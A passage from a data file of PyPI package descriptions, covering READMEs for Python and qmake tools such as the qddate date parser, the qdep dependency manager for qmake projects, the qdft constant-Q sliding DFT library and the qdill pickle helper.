FLOAT \u041a\u043e\u0440\u0440\u0435\u043a\u0442\u0438\u0440\u043e\u0432\u043a\u0430 Y.\n -dz, --z-correction FLOAT \u041a\u043e\u0440\u0440\u0435\u043a\u0442\u0438\u0440\u043e\u0432\u043a\u0430 Z.\n CSV \u041f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u044b: \u041f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u044b \u043a\u0430\u0441\u0430\u044e\u0449\u0438\u0435\u0441\u044f \u0437\u0430\u043f\u0438\u0441\u0438 CSV \u0442\u0430\u0431\u043b\u0438\u0446\u044b\n -csvd, --csv-delimiter TEXT CSV \u0440\u0430\u0437\u0434\u0435\u043b\u0438\u0442\u0435\u043b\u044c \u0437\u043d\u0430\u0447\u0435\u043d\u0438\u0439 \u043a\u043e\u043b\u043e\u043d\u043e\u043a (\u043f\u043e-\u0443\u043c\u043e\u043b\u0447\u0430\u043d\u0438\u044e \",\").\n -csvs, --csv-skip-headers \u041d\u0435 \u0437\u0430\u043f\u0438\u0441\u044b\u0432\u0430\u0442\u044c \u0437\u0430\u0433\u043e\u043b\u043e\u0432\u043e\u043a \u0442\u0430\u0431\u043b\u0438\u0446\u044b.\n -csvy, --csv-yxz \u0418\u0437\u043c\u0435\u043d\u0438\u0442\u044c \u043f\u043e\u0440\u044f\u0434\u043e\u043a \u0437\u0430\u043f\u0438\u0441\u0438 \u0441 X,Y,Z \u043d\u0430 Y,X,Z \u0432\n CSV \u0442\u0430\u0431\u043b\u0438\u0446\u0435.\n \u0414\u0440\u0443\u0433\u0438\u0435 \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u044b: \u0414\u0440\u0443\u0433\u0438\u0435 \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u044b \u043a\u043e\u043d\u0432\u0435\u0440\u0442\u0435\u0440\u0430\n -st, --singlethreaded \u0417\u0430\u043f\u0443\u0441\u0442\u0438\u0442\u044c \u043a\u043e\u043d\u0432\u0435\u0440\u0442\u0435\u0440 \u0432 \u043e\u0434\u043d\u043e\u043c \u043f\u043e\u0442\u043e\u043a\u0435.\n -vc, --validity-codes 
\u0417\u0430\u043f\u0438\u0441\u044b\u0432\u0430\u0442\u044c \u043a\u043e\u0434 \u043a\u0430\u0447\u0435\u0441\u0442\u0432\u0430 \u0432\u043c\u0435\u0441\u0442\u043e \u0433\u043b\u0443\u0431\u0438\u043d\u044b.\n -q, --quite \"\u041c\u043e\u043b\u0447\u0430\u043b\u0438\u0432\u044b\u0439 \u0440\u0435\u0436\u0438\u043c\"\n --version Show the version and exit.\n --help Show this message and exit."} +{"package": "qddate", "pacakge-description": "qddateis a Python 3 lib that helps to parse any date strings from html pages extremely fast. This lib was created during long term\nnews aggregation efforts and analyzing in wild HTML pages with dates. It\u2019s not intended to have beautiful code,\nsupport for so much languages as possible and so on. It should help to process millons of strings to identify\nand parse dates. qddata was part of proprietary technology of \u201cnews reconstruction\u201d. It\u2019s used to automatically create\nRSS feeds from sites without it.If you are looking for more advanced (and slower) date parsing trydateparseranddateutil.DocumentationDocumentation is built automatically and can be found onRead the Docs.FeaturesMore than 348 date patterns supported (by the end 2017)Generic parsing of dates in English, Russian, Spanish, Portugenese and other languagesSupports strings with with left aligned dates and supplimental words. Example: \u201c12.03.1999 some text here\u201dExtremely fast, uses pyparsing, hard-coded constants and dirty speed optimizations tricksLimitationsNot all languages supported, more languages will be added by request and exampleNot so easy to add new language based date patterns as it\u2019s in dateparser for example.Could miss some rarely used date formatsDoesn\u2019t support relative datesDoesn\u2019t support calendarsSpeed optimizationAll constants are hard encoded, no external settingsUses only datetime and pyparsing as external libraries. No more dependencies, all reused code incorporated into the lib codeNo regular expressions, instead pre-generated pyparsing patternsIntensive pattern filtering using min/max text length filters and common text patternsNo one settings/data file loaded from diskUsageThe easiest way is to use theqddate.DateParserclass,\nand it\u2019sparsefunction.Popular Formats>>> import qddate\n>>> parser = qddate.DateParser()\n>>> parser.parse('2012-12-15')\ndatetime.datetime(2012, 12, 15, 0, 0)\n>>> parser.parse(u'Fri, 12 Dec 2014 10:55:50')\ndatetime.datetime(2014, 12, 12, 10, 55, 50)\n>>> parser.parse(u'\u043f\u044f\u0442\u043d\u0438\u0446\u0430, \u0438\u044e\u043b\u044f 17, 2015') # Russian (17 July 2015)\ndatetime.datetime(2015, 1, 13, 13, 34)This will try to parse a date from the given string, attempting to\ndetect the language each time.Dependenciesqddaterelies on following libraries in some ways:pyparsingis a module for advanced text processing.Supported languagesBulgarianCzechEnglishFrenchGermanPortugueseRussianSpanishThanksI wrote this date parsing code at 2008 year and later only updated it several times, migrating from regular expressions\nto pyparsing. Looking atdateparser clean code and documentation motivated me\nto return to this code and to clean it up and to share it publicly. 
I\u2019ve used same documentation and code style approach\nand reused build scripts and documentation generation style from dateutil.\nMany thanks to ScrapingHub team!"} +{"package": "qdds", "pacakge-description": "qddsQuick Django Dev Server usingClickInstall:$ pip install qddsUsing qdds:Inside your Django project folder where manage.py resides\n\n$ devserver\n\nThis will start run the equivalent of\n\n$ ./manage.py runserver 0.0.0.0:8000\n\nThis makes it run the dev server where it is listening on your IP:8000, and other people on the networks, or your phone on the WiFi can reach the server.Options:You can also use the -regular option to use runserver normally\n\n$ devserver -regular\n\nbut don't do this, its silly."} +{"package": "qde", "pacakge-description": "Quality Data ExtractorQDE lets you extract the quality data from a generated data set.Get a relatively smaller data setGenerate new automated samples of it using any generative model.Pass both the sets into qde and get filtered combined data.How to use qdeFit training, generated and test data into qdeqde_obj=qde.quality_data_extractor()qde_obj.fit(train_set,new_set,test_set)Get accuracy of unfiltered combined dataqde_obj.get_accuracy()Get filtered data along with its accuracy using method 1comb_data_1,accuracy_1=qde_obj.get_combined_data(recipe=0)Get filtered data along with its accuracy using method 2comb_data_2,accuracy_2=qde_obj.get_combined_data(recipe=1)"} +{"package": "qdeep", "pacakge-description": "Deep Q Learning FrameworkSimple Deep Q Learning framework. This is just a slightly modified version ofDeepMind Acme's implementation of a deep Q network,\nwith a few extra utilities. You can install it withpipby using the following command:$ pip install qdeep"} +{"package": "qdep", "pacakge-description": "qdepA very basic yet simple to use dependency management tool for qmake based projects.Table of contentsqdepFeaturesDesign Goals/ScopeInstallationPreparing qmakeShell completitionsGetting startedGetting deeperDependency IDsVersioningPackage-uniqueness and version conflictsNormal dependenciesTranslationsLibrary supportCreating normal dependenciesCreating qdep translationsResources and hooksAutomatic exportsProject dependenciesCreating project dependenciesDocumentationCommand line interfacePublic API operations:Private API operations:QMAKE-FeatureVariablesCommon VariablesSUBDIRS extensionAdvanced VariablesConfiguration valuesInput valueOutput valuesDefinesEnvironment variablesPublic make targetsInternalVariablesConfiguration valuesQMAKE test functionsQMAKE replace functionsTable of contents generated with markdown-tocFeaturesSeamless integration in qmake projects - no extra files neededBasic dependency management using git repositories as package sourcesGlobally caches source files to speed up buildsPackages are simple pri-files that are included by the target projectRecursive dependency solvingAllows branch and tag based versioningSupports translations for qdep packagesSupports automatic export of qdep packages from dynamic librariesHandles QRC-Resources and startup hooks to work even when used in static librariesSupports special \"Project dependencies\" wich allows you to add whole qmake projects to a SUBDIRS projectCan generate \"library export\" pri files that provide an easy and reliable way to link against librariesImplicitly supports exported qdep packages and projectsDesign Goals/Scopeqdep was designed with the following goals in mind:Full qmake integration: qdep should not require any extra commands to install packages 
and prepare a project to be built. Just running qmake on the target project should take care of thisSimple installation: Using python makes it easy to use the tool on any platform. Besides the install only a single setup command is needed to make qdep work for any Qt installationFull Qt support: All features of Qt - including resources, startup hooks and translations should be supported with minimal effort for application developersLibrary exports: Since all qdep packages are source based, having multiple libraries that use the same package can be problematic. With qdep, one can \"export\" a package from a library, making it available to all the others.No additional server infrastructure: qdep should not require any extra servers to provide a package index. Any git repository can server as a package without any extra preparations neededPlease note that qdep is kept intentionally small to fullfill exactly those goals. Other build systems or more complex package management features are not supported and never will be. This project will stay active until the Qt Company switches their build systems to CMake. At that point this project will either be dropped or ported to CMake, depending on what alternative solutions already exist at that point.InstallationTo install the package, follow one of the following possibilities. Please note that only Python >= 3.7 is officially supported. Earlier versions might work as well, but have not been tested.Arch Linux:Use the AUR-Package:qdepAny Platform:Install via pip:pip install qdepAny Platform:Clone the repository and install the sources directly:python setup.py installPreparing qmakeAfter installing (except when using the AUR-package), you have to \"enable\" qdep for each Qt-Kit you want to use qdep with. This can be done by opening a terminal and calling:qdepprfgen--qmake\"
\"For example, if you have installed Qt 5.12.0 for MSVC 2017 x64 on windows in the default location (C:\\Qt), the command would look like this:qdepprfgen--qmake\"C:\\Qt\\5.12.0\\msvc2017_64\\bin\\qmake.exe\"Note:Depending on how the corresponding Qt-Kit was installed, you might need to run the command with administrator/sudo permissions. Alternatively, you can call the command with--dir /some/pathand export that very same path as value to theQMAKEPATHenvironment variable, if you have no such permissions.Shell completitionsFor Unix systems, qdep makes use ofargcompleteto provide completitions for bash/zsh to activate them, add the following code your shell initializer scripts:Forzsh, add this to~/.zshrc:autoloadbashcompinit\nbashcompinit\nautoloadcompinit\ncompiniteval\"$(register-python-argcompleteqdep)\"Forbash, add this to~/.bashrc:eval \"$(register-python-argcomplete qdep)\"When using BASH, you can alternatively use global completition - seeActivating global completionfor more details on that. Other shells might work as well, depending on how well argcomplete works with them. Refer to the argcomplete documentation and their GitHub Repository .Getting startedThe basic usage of qdep is very simple. For this example, we assume you want to add for exampleQHotkeyto a project via qdep. All you have to do is to install (and prepare) qdep and then add the following two lines to your pro-file:QDEP_DEPENDS += Skycoder42/QHotkey\n!load(qdep):error(\"Failed to load qdep feature\")Thats it! The next time you run qmake qdep will automatically download the latest release and add them to your project. Just compile the project and you can use the library. A more explicit way to specify the package (and what that shorter string extends to) would behttps://github.com/Skycoder42/QHotkey.git@1.2.2/qhotkey.priGetting deeperBesides this basic functionality of referencing qdep packages, qdep offers a few additional things to make using (and developing) those easier. In the following sections, they will be explained in detail.Dependency IDsQdep dependencies are described by IDs. These IDs follow the format[@[/]]. The only relevant part is the URL, and it can either be implicit or explicit. Implicit URLs follow the format/and are automatically expanded tohttps://github.com//.git. For the explicit format, all kinds of GIT-URLs are supportet, i.e. HTTPS, SSH and FILE urls.If you leave out the path part of a qdep package, qdep assumes that there is a pri file named.priin the repositories root directory. If that is not the case, or if a package has multiple different pri files to choose from, you can specify a path relative to the repositories root to that pri file to use that one instead of the automatically detected one.VersioningQdep supports 3 kinds of versioning: Unversioned, branches, tags. If you leave out the version, qdep will automatically query the corresponding repository and get the latest tag (by \"creation\") and use that one. If you do specify a version, it can either be a git tag or a git branch. In case of a tag, qdep will simply download it and assume it to be persistant, i.e. never check for updates on that specific tag. Referencing a branch however will lead to qdep \"tracking\" that branch, and before every build, qdep pulls on the branch to update if neccessary.Generelly speaking, it is recommended to use explicit tags. Implicit versioning is fine, too, but updates to packages might break your builds at times you do not want them to. 
Branch versioning is always dangerous and should only be used on explicitly stable branches or for package delevopment.Package-uniqueness and version conflictsWhen working with recursive package dependencies, it can sometimes happen that two different packages include different versions of the same package. qdep circumvents this issue by making shure only a single version of each package is ever included. The first version this is referenced is the one that is choosen. Explicit package paths however are not considered the same package, i.e. it is possible to include two different pri files from the same git repository. Generelly speaking, a packages unique identifier is determined by itsand its- both case insensitive.Normal dependenciesNormal dependencies, aka pri-dependencies specified viaQDEP_DEPENDSare the primary dependency type of qdep. They are typically resolve to a simple pri files, that is included into your project by qdep. You can do anything in these pri files you would also in a \"normal\" pri file. However, there are a few extra things that become possible when including qdep dependencies.TranslationsThe first feature is extended support for translations. Qdep packages can come with translation source files for their own sources. These are typically exported via theQDEP_TRANSLATIONSqmake variable. When creating your own translations, qdep will automatically merge these with your own translations at build time. This however onyl works if you make use of thelreleaseqmake feature, provided by qt. SeeQMake TRANSLATIONSandQMake QM_FILES_INSTALL_PATfor more details.Library supportWhen using qdep in static or dynamic libraries, there are often special steps needed to make that fully work. However, qdep takes care of those steps and performs them for you. The only thing you need to do is enable library exports from your library and then import that export from your primary project. For example, assuimg you have the following project structure:root (subdirs)\n |-library (lib)\n |-app (app)And you have a library that depends on QHotkey. If you want to use this library from app, you would create the library pro file as follows:TEMPLATE = lib\nCONFIG += static # dynamic libraries are also possible, but dependencies must support exporting for them to work on windows\n\n# ...\n\nQDEP_DEPENDS += Skycoder42/QHotkey\nQDEP_EXPORTS += Skycoder42/QHotkey\nCONFIG += qdep_link_export\n!load(qdep):error(\"Failed to load qdep feature\")And then reference the library in the app pro file. This also takes care of linking the library to the app, so no additionalINCLUDEPATHorLIBSchanges are needed:TEMPLATE = app\n\n# ...\n\nQDEP_LINK_DEPENDS += ../library\n!load(qdep):error(\"Failed to load qdep feature\")And thats it! You can now use the QHotkey in the library and the app project without any additional work, as qdep will reference the QHotkey that is now embedded into the library project.Note:This will also work for dynamic librabries, but only if theexplicitlysupport qdep package exporting. If not, linking will fail at least on windows, and possibly on other platforms as well.Creating normal dependenciesThis section is intended for developers that want to create their own qdep packages. Generally speaking, there is not much you need to do different from creating normal pri includes. However, there are a few small things in qdep you can use to your advantage to create better packages. 
They are described in the following sub sections and are:Translation generationResources and startup hooksautomatic exportsCreating qdep translationsThe only difference when creating translations with qdep is where you put them. Instead of TRANSLATIONS, create a qmake variable called QDEP_TRANSLATIONS and add all the ts files you want to generate to it. Next, call the following command to actually generate the ts-files based on your pri file:qdeplupdate--qmake\"\"--pri-file\"\"[--...]And thats it. You should now be able to find the generated TS-files where you wanted them to be as specified in the pri file.When creating packages that should work with and without qdep, you can add the following to your pri file to still make these translations available if the package is included without qdep:!qdep_build: EXTRA_TRANSLATIONS += $$QDEP_TRANSLATIONSResources and hooksOne thing that can be problematic, especially when working with static libraries, is the use of RESOURCES and startup hooks. To make it work, qdep automatically generates code to load them. For resources, there is nothing special you need to do as package developer.For hooks however, thats a different story. Assuming you have the following function you want to be run asQ_COREAPP_STARTUP_FUNCTION:voidmy_package_startup_hook(){doStuff();}You will have to add the following line to your qdep pri file to make shure this hook actually gets called:QDEP_HOOK_FNS += my_package_startup_hookAnd with that, qdep will automatically generate the code needed to call this method asQ_COREAPP_STARTUP_FUNCTION.When creating packages that should work with and without qdep, you can add the following to the cpp file that contains the hook function to make it work for non-static projects, even if the package is included without qdep:#ifndef QDEP_BUILD#includeQ_COREAPP_STARTUP_FUNCTION(my_package_startup_hook)#endifAutomatic exportsAnother very useful tool are automatic package exports. This allows qdep to automatically export a qdep package from a dynamic library, so other applications that link to that library can use the exported qdep packages API. This is basically equivalent to the following:#ifdef BUILD_PACKAGE_AS_LIBRARY#ifdef IS_DLL_BUILD#define MY_PACKAGE_EXPORT Q_DECL_EXPORT#else#define MY_PACKAGE_EXPORT Q_DECL_IMPORT#endif#else#define MY_PACKAGE_EXPORT#endifclassMY_PACKAGE_EXPORTMyClass{// ...};qdep basically automates the define part, so you don't have to care about correctly defining all those macros and your code can be reduced to:classMY_PACKAGE_EXPORTMyClass{// ...};To make it work, simply add the following to your pri file:QDEP_PACKAGE_EXPORTS += MY_PACKAGE_EXPORTAnd thats it! When using the package normally, qdep will automatically add an empty define that defines MY_PACKAGE_EXPORT to nothing. When building a dynamic library and the end user wants to export the package, it gets defined as Q_DECL_EXPORT (and Q_DECL_IMPORT for consuming applications).When creating packages that should work with and without qdep, you can add the following to the pri file to manually define the macro to nothing, even if the package is included without qdep:!qdep_build: DEFINES += \"MY_PACKAGE_EXPORT=\"Project dependenciesAnother side of qdep besides normal pri dependencies are full project dependencies. In this scenario, you include a full qmake project into your tree as child of a SUBDIRS projects. This allows the use of qdep package export pri files to link to these projects without much effort. 
To make use of this feature, you have to use a subdirs project that references the pro dependency, as well as normal projects that link against it. One great advantage of using project dependencies is that they can reference other project dependencies they depend on, which means even for full projects, qdep takes care of the recursive dependency resolving for you.To get started, assume the following project structure:root (subdirs)\n |--libs (subdirs)\n | |--lib (lib)\n |--app (app)Both lib and app are assumed to depend on a theoretical qdep project dependency named Skycoder42/SuperLib, but app also depends on lib.The first step would be to choose a subdirs project to add the dependency to. For this example, the libs project is chosen. Add the following lines to add the dependency:TEMPLATE = subdirs\nSUBDIRS += lib\n\n# ....\n\nQDEP_PROJECT_SUBDIRS += Skycoder42/SuperLib\nlib.qdep_depends += Skycoder42/SuperLib\n!load(qdep):error(\"Failed to load qdep feature\")The QDEP_PROJECT_SUBDIRS variable is used to actually pull in the project dependency, while adding it to lib.qdep_depends only makes sure that the qdep dependency is built before lib. This is not needed if lib does not depend on the qdep dependency. It is however recommended to always have a separate subdirs project for qdep dependencies, i.e. for this concrete example it would be better to move the lib project one stage up or create another subdir project within libs that references the qdep dependencies.Next, we need to reference the library itself in app/lib. The procedure is the same for both, so here it is only shown for the app project as an example. In the app pro file, add the lines:QDEP_PROJECT_ROOT = libs # Or \"./libs\" - would be \"..\" for the lib project\nQDEP_PROJECT_LINK_DEPENDS += Skycoder42/SuperLib\n!load(qdep):error(\"Failed to load qdep feature\")QDEP_PROJECT_ROOT tells qdep where the project that contains the reference to the actual qdep project dependency is located, and QDEP_PROJECT_LINK_DEPENDS lists all the dependencies this project (app) depends on. If any dependency listed there was not specified in the libs project via QDEP_PROJECT_SUBDIRS, the build will fail.And with that, the project dependency has been successfully added and referenced. With the next build, the project would be downloaded, compiled and linked against app/lib.Creating project dependenciesGenerally speaking, project dependencies are just normal qmake projects. However, such a project should always include the qdep feature and add qdep_link_export to the config, as without the generated export pri file, it will not be usable as a qdep project dependency. But besides that, you can do anything you want, i.e. add other normal qdep pri dependencies etc. and even export them if needed.However, there is one additional feature that is only possible with qdep project dependencies: you can directly reference other qdep project dependencies. Doing so will make sure that whichever subdirs project includes this project will also include the dependencies as subdirs and ensure the qmake build order, as well as referencing the corresponding export pri files. To reference, for example, Skycoder42/SuperLib from within a qdep project dependency, add the following:QDEP_PROJECT_DEPENDS += Skycoder42/SuperLib\n!load(qdep):error(\"Failed to load qdep feature\")DocumentationIn the following sections, all the functions, variables etc. of qdep are documented for reference.Command line interfaceqdep has a public and a private command line API. 
The public API is intended to be used by developers, while the internal API is used by the qdep qmake feature to perform various operations. The following sections list all the commands with a short description. For more details on each command, type qdep --help. Public API operations:prfgen Generate a qmake project feature (prf) for the given qmake.\ninit Initialize a pro file to use qdep by adding the required lines.\nlupdate Run lupdate for the QDEP_TRANSLATION variable in a given pri\n file.\nclear Remove all sources from the user's global cache.\nversions List all known versions/tags of the given package\nquery Query details about a given package identifier\nget Download the sources of one or more packages into the source\n cache.\nupdate Check for newer versions of used packages and optionally update\n them.Private API operations:dephash Generate unique identifying hashes for qdep\n packages.\npkgresolve Download the given qdep package and extract relevant\n information from it.\nhookgen Generate a header file with a method to load all\n resource hooks.\nhookimp Generate a source file that includes and runs all\n qdep hooks as normal startup hook.\nlconvert Combine ts files with translations from qdep\n packages.\nprolink Resolve the path a linked project dependency would\n be at.QMAKE-FeatureThis is the documentation of the qmake feature that is generated by qdep and loaded by adding load(qdep) to your project. All variables, CONFIG-flags and more are documented below.VariablesCommon VariablesNameDirectionDefaultDescriptionsQDEP_PATHin/outHolds the path to the qdep binary to be used. Can be overwritten to specify a custom locationsQDEP_VERSIONoutThe version of qdep which was used to generate the qdep featureQDEP_GENERATED_DIRin$$OUT_PWDThe sub-directory in the build folder where qdep should place all its generated files. Can be an absolute or relative pathQDEP_EXPORT_PATHin$$QDEP_GENERATED_DIR/The directory where to place export pri files for libraries that export dependencies. Can be relative to OUT_PWD or absolute. Use QDEP_EXPORT_NAME to get the name of that file without a pathQDEP_DEPENDSinSpecify all dependencies to qdep packages to be included into your projectQDEP_LINK_DEPENDSinReference other projects in the same build tree that this project should link against. Those projects must be exporting a pri fileQDEP_PROJECT_SUBDIRSinSpecify all dependencies to qdep projects to be added as qmake project to the SUBDIRS variable. Only evaluated in projects that specify TEMPLATE as subdirsQDEP_PROJECT_ROOTinThe path to a qmake project directory or file to resolve QDEP_PROJECT_LINK_DEPENDS againstQDEP_PROJECT_LINK_DEPENDSinSpecify all dependencies to qdep projects this project should be linked against. The dependencies are assumed to be provided in that project via QDEP_PROJECT_SUBDIRS.QDEP_DEFINESinSpecify DEFINES that are exported if the library exports a pri file. All values are automatically added to DEFINES by qdepQDEP_INCLUDEPATHinSpecify INCLUDEPATHS that are exported if the library exports a pri file. All values are automatically added to INCLUDEPATH by qdepQDEP_LIBSinSpecify LIBS that are exported if the library exports a pri file. All values are automatically added to LIBS by qdepQDEP_EXPORTSinSpecify qdep dependencies of which the API should be exported. 
Can be useful to export packages when used in dynamic libraries - only works if packages explicitly support thisQDEP_LUPDATE_INPUTSinAdditional files or folders to parse for translations when running make lupdateQDEP_PACKAGE_EXPORTSin (pkg)Variables to be defined as import/export/nothing and be used as prefix to a class.QDEP_TRANSLATIONSin (pkg)Specify translation subfiles within a qdep dependency to be merged with the translations of the project they are included fromQDEP_PROJECT_DEPENDSin (pkg)Specify all dependencies to qdep projects this qdep project depends on. Can only be used in qdep project dependencies and adds its contents to QDEP_PROJECT_SUBDIRS of the project that includes this dependencyQDEP_VAR_EXPORTSin (pkg)Specify the names of additional qmake variables that should be exported from a qdep dependency besides DEFINES and INCLUDEPATH. SUBDIRS extensionqdep_depends: Can be added to any variable passed to SUBDIRS in a project that uses QDEP_PROJECT_SUBDIRS to specify that a certain subdir project depends on that specific package. This does not take care of linkage etc. It only ensures that the make targets are built in the correct order.Advanced VariablesNameDirectionDefaultDescriptionsQDEP_TOOLin/outThe escaped command line base for qdep commands run from within qmakeQDEP_CACHE_SCOPEinstashThe method of caching to be used to cache various qmake related stuff. Can be , super or stashQDEP_GENERATED_SOURCES_DIRout$$QDEP_GENERATED_DIR/The directory where generated source files are placed. Is determined by the build configuration to take debug/release builds into accountQDEP_GENERATED_TS_DIRin$$QDEP_GENERATED_DIR/.qdepts/The directory where generated translation sources are placed.QDEP_LUPDATEinlupdate -recursive -locations relativeThe path to the lupdate tool and additional arguments for lupdate in the make lupdate command to control its behaviourQDEP_LCONVERTinlconvert -sort-contextsThe path to the lconvert tool and additional arguments to be used to combine translationsQDEP_EXPORT_NAMEin/out_export.priThe name of a generated library import file. Must be only the name of the file, use QDEP_EXPORT_PATH to specify the locationQDEP_EXPORTED_DEFINESoutDEFINES that come from QDEP_PACKAGE_EXPORTS or DEFINES from any directly included qdep dependencyQDEP_EXPORTED_INCLUDEPATHoutINCLUDEPATHs that come from any directly included qdep dependencyQDEP_EXPORTED_LIBSoutLIBS that come from any directly included qdep dependencyQDEP_HOOK_FNSoutHolds all names of functions to be run as startup hook by qdepConfiguration valuesInput valueqdep_force: Enforce the full evaluation of qdep, even if the pro file is being evaluated without a context (This is potentially dangerous and should not be used unless absolutely necessary)qdep_no_pull: Do not pull for newer versions of branch-based dependencies. Cloning new packages will still workqdep_no_clone: Do not clone completely new packages or package versions. Pulling on already cached branches will still workqdep_no_cache: Do not cache the used versions of packages without a specified version. Instead the latest version is queried on every runqdep_export_all: export all dependent packages, i.e. any QDEP_PACKAGE_EXPORTS for every package are treated as if added to QDEP_EXPORTSqdep_no_link: When exporting packages from a library, do not add the qmake code to link the library (and to its includes) to the generated export.pri fileqdep_no_qm_combine: Do not combine TRANSLATIONS with QDEP_TRANSLATIONS. 
Instead treat QDEP_TRANSLATIONS as EXTRA_TRANSLATIONS and generate separate qm files for themqdep_link_export: Enforce the creation of an export pri file. Normally only libraries without qdep_no_link defined or projects that specify qdep_export_all or have values in QDEP_EXPORTS generate such filesqdep_no_export_link: Do not export contents of QT, PKGCONFIG or QDEP_LIBS in a generated export pri fileOutput valuesqdep_build: Is set in case the qdep feature was loaded correctly and is enabledDefinesQDEP_BUILD: Is defined in case the qdep feature was loaded correctly and is enabledEnvironment variablesQDEP_CACHE_DIR: The directory where to cache downloaded sources. Is automatically determined for every system but can be overwritten with this variableQDEP_SOURCE_OVERRIDE: Allows providing a mapping in the format;^;. This will make qdep automatically replace any occurrence of pkg1 with pkg2 etc. Can be used by developers to temporarily overwrite packagesQDEP_DEFAULT_PKG_FN: A template that is used to resolve non-url packages like User/package to a full url. The default method for that is https://github.com/{}.git - with {} being replaced by the short package name.Public make targetsmake lupdate: Runs the lupdate tool to update your translations in a quick and easy manner, without having to rely on potentially buggy pro-file-parsing.InternalVariables__QDEP_PRIVATE_SEPERATOR: Separator between datasets__QDEP_TUPLE_SEPERATOR: Separator between values within a dataset__QDEP_INCLUDE_CACHE: objects with details about included dependencies of all kinds__QDEP_ORIGINAL_TRANSLATIONS: All original translations that were in TRANSLATIONS before applying translation combination with QDEP_TRANSLATIONS from included packages__QDEP_HOOK_FILES: Paths to header files that contain hook definitions that must be included and loaded by a project__QDEP_EXPORT_QMAKE_INCLUDE_GUARD: a cache of included exported pri files to ensure each gets included only onceConfiguration values__qdep_script_version: The version detected at runtime as reported by the qdep executable__qdep_dump_dependencies: Create a file named qdep_depends.txt in the build directory that contains all direct dependencies of the projectQMAKE test functionsqdepCollectDependencies(dependencies ...): Downloads all specified normal dependencies and adds them to __QDEP_INCLUDE_CACHE to be linked later by qdep. Works recursivelyqdepCollectProjectDependencies(dependencies ...): Downloads all specified project dependencies and adds them to SUBDIRS. 
Works recursivelyqdepResolveSubdirDepends(subdir-vars ...): Converts the values of theqdep_dependssubvar of all variables passed to the function to normal subdirsdependssubvarsqdepCreateExportPri(path): Creates a file named path and adds all export-related code to itqdepShellQuote(paths ...): Makes the given paths absolute based on_PRO_FILE_PWD_and escapes them usingshell_quoteqdepDumpUpdateDeps(): Creates a file named qdep_depends.txt in the build directory that contains all direct dependencies of the projectQMAKE replace functionsqdepResolveProjectLinkDeps(project-root, link-depends ...): Resolves all link-depends project packages to subdir paths, assuming they are provided by the project located at project-rootqdepOutQuote(name, values): Creates a number of lines of qmake code that assing each value in values to a variable named name, in a securely quoted mannerqdepLinkExpand(path): Expands a shortened or relative path to a project that exports dependencies to get the path of the export pri fileqdepResolveLinkRoot(path): Searches for a top-level qmake project, that has this project included as project dependency and returns the path to that pro file. Search is started based on path, which must be a build directory"} +{"package": "qdft", "pacakge-description": "Constant-Q Sliding DFT in C++ and Python (QDFT)Forward and inverse Constant-Q Sliding DFT according to[1]with following features:Arbitrary octave resolution (quarter toneby default)Built-in parameterizable cosine family window (Hann by default)Customizable time and frequency domain data type in C++Endless single or multiple sample processing at onceOptional analysis latency control parameterReal-time analysis and synthesis capabilityThe Constant-Q Sliding Discrete Fourier Transform (QDFT) is a recursive approach to compute the Fourier transform sample by sample. This is an efficient implementation without the FFT calculus. Just define an arbitrary frequency range and octave resolution to obtain the corresponding DFT estimate. In contrast to the linearSDFT, frequency bins of the QDFT are logarithmically spaced. Thus, both high and low frequencies are resolved with the same quality, which is particularly useful for audio analysis. Based on the QDFT, a chromagram feature with detailed instantaneous frequency estimation is planned for the future release.WIPReadmeDocstringsPyPI packageqdftSlidingchromagramas a bonus (a draft is already included in the Python package)Basic usageC++#include// see also src/cpp folderdoublesr=44100;// sample rate in hertzstd::pairbw={50,sr/2};// lowest and highest frequency in hertz to be resolveddoubler=24;// octave resolution, e.g. number of DFT bins per octaveQDFTqdft(sr,bw,r);// create qdft plan for custom time and frequency domain data typessize_tn=...;// number of samplessize_tm=qdft.size();// number of dft binsfloat*x=...;// analysis samples of shape (n)float*y=...;// synthesis samples of shape (n)std::complex*dft=...;// dft matrix of shape (n, m)qdft.qdft(n,x,dft);// extract dft matrix from input samplesqdft.iqdft(n,dft,y);// synthesize output samples from dft matrixThe time domain data type defaults tofloatand the frequency domain data type todouble.PythonfromqdftimportQDFT# see also src/python foldersr=44100# sample rate in hertzbw=(50,sr/2)# lowest and highest frequency in hertz to be resolvedr=24# octave resolution, e.g. 
number of DFT bins per octaveqdft=QDFT(sr,bw,r)# create qdft plann=...# number of samplesm=qdft.size# number of dft bins (if need to know in advance)x=...# analysis samples of shape (n)dft=qdft.qdft(x)# extract dft matrix of shape (n, m) from input samplesy=qdft.iqdft(dft)# synthesize output samples from dft matrixFeel free to obtain current version fromPyPIby executingpip install qdft.ExamplesQDFTChroma12face.pycmajor.pySee alsoIf you're interested in Sliding DFT withlinearfrequency resolution, don't forget to browse myjurihock/sdftproject!ReferencesRussell Bradford et al. (2008). Sliding with a Constant Q. International Conference on Digital Audio Effects.https://www.dafx.de/paper-archive/2008/papers/dafx08_63.pdfRussell Bradford et al. (2005). Sliding is Smoother Than Jumping. International Computer Music Conference Proceedings.http://hdl.handle.net/2027/spo.bbp2372.2005.086Eric Jacobsen and Peter Kootsookos (2007). Fast, Accurate Frequency Estimators. IEEE Signal Processing Magazine.https://ieeexplore.ieee.org/document/4205098Licensegithub.com/jurihock/qdftis licensed under the terms of the MIT license.\nFor details please refer to the accompanyingLICENSEfile distributed with it."} +{"package": "qdi", "pacakge-description": "Dependency injection the library for python"} +{"package": "qdict", "pacakge-description": "No description available on PyPI."} +{"package": "qdill", "pacakge-description": "qdilla VERY minimal python convenience library for dillare youtiredof writingwith open(...) as fevery time you try and use pickle/dill as you're hacking something together in python?this is the library for you.it defines some simple functions over dill so that you can just dovar = qdill.load(filename)ORqdill.save(thing, filename)There's also a thirddefaultLoadfunction.It checks if the file exists, and if the file doesn't exist, it saves the default thing to the file AND returns the default thing.\ni.e.var = qdill.defaultLoad(default_thing, filename)you can read the code. it's all just ~25 lines in the__init__.pyif you need more fine-grained control of dill...Don't use this 'library'"} +{"package": "qdiv", "pacakge-description": "No description available on PyPI."} +{"package": "qdj", "pacakge-description": "QDJ isdjango-admin.pystartproject, but with your own templates.\nThe project starter for obsessives with deadlines.Install qdj:# pip install qdjCreate a project template:# qdj createCreated Django 1.3 template in/Users/nath/.qdj/1.3Check out the template:# cd~/.qdj/1.3# find../hooks.py./files./files/settings.py./files/manage.py./files/urls.py./files/__init__.pyAdd a dynamic requirements file:# echo >>files/requirements.txt \"django == {{ 